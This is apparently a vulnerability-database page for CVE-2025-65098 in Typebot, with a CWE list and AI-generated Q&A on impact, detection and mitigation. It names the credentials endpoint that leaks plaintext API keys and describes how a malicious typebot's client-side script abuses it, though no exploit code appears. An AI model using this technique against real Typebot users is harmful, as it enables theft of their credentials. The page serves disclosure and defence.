CVE-2025-65098
BaseFortify
Publication date: 2026-01-22
Last updated on: 2026-01-30
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| typebot | typebot | to 3.13.2 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-639 | The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. |
| CWE-522 | The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. |
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-200 | The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
| CWE-311 | The product does not encrypt sensitive or critical information before storage or transmission. |
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows attackers to steal sensitive credentials such as API keys, tokens, and passwords, potentially leading to unauthorized access to personal and confidential data. Such a breach could result in non-compliance with data protection regulations like GDPR and HIPAA, which require safeguarding sensitive information and ensuring proper access controls. The exposure of credentials and subsequent unauthorized data access may lead to significant financial and data breaches, violating these standards' requirements for confidentiality and data security. [1]
Can you explain this vulnerability to me?
CVE-2025-65098 is a high-severity vulnerability in Typebot versions prior to 3.13.2 that allows attackers to steal all stored credentials from users. This happens because Typebot executes arbitrary client-side JavaScript when a user runs a malicious typebot, enabling the attacker to use the victim's authenticated session to call an API endpoint (/api/trpc/credentials.getCredentials) that returns plaintext API keys and other sensitive credentials without verifying ownership. As a result, attackers can exfiltrate OpenAI keys, Google Sheets tokens, SMTP passwords, and more by tricking users into running malicious scripts. [1]
How can this vulnerability impact me? :
This vulnerability can lead to significant credential theft, allowing attackers to obtain sensitive API keys and tokens such as OpenAI keys, Google Sheets tokens, and SMTP passwords. This can result in unauthorized use of services (e.g., costly OpenAI API usage), exposure of confidential company data stored in Google Sheets, and compromise of email systems via stolen SMTP credentials. Overall, it can cause financial loss, data breaches, and unauthorized access to critical resources. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection can involve monitoring for unusual API calls to the /api/trpc/credentials.getCredentials endpoint, especially those that return plaintext credentials without proper authorization. Network monitoring tools can be used to detect outgoing requests from browsers running Typebot to attacker-controlled servers, indicating possible exfiltration. Additionally, reviewing Typebot instances for Script blocks with 'Execute on client' enabled that contain suspicious JavaScript can help identify malicious bots. Specific commands are not provided in the resources. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade Typebot to version 3.13.2 or later, where this vulnerability is fixed. Additionally, users should avoid running untrusted typebots or Script blocks with 'Execute on client' enabled. Reviewing and revoking potentially compromised API keys (OpenAI keys, Google Sheets tokens, SMTP passwords) is also recommended to prevent unauthorized access. [1]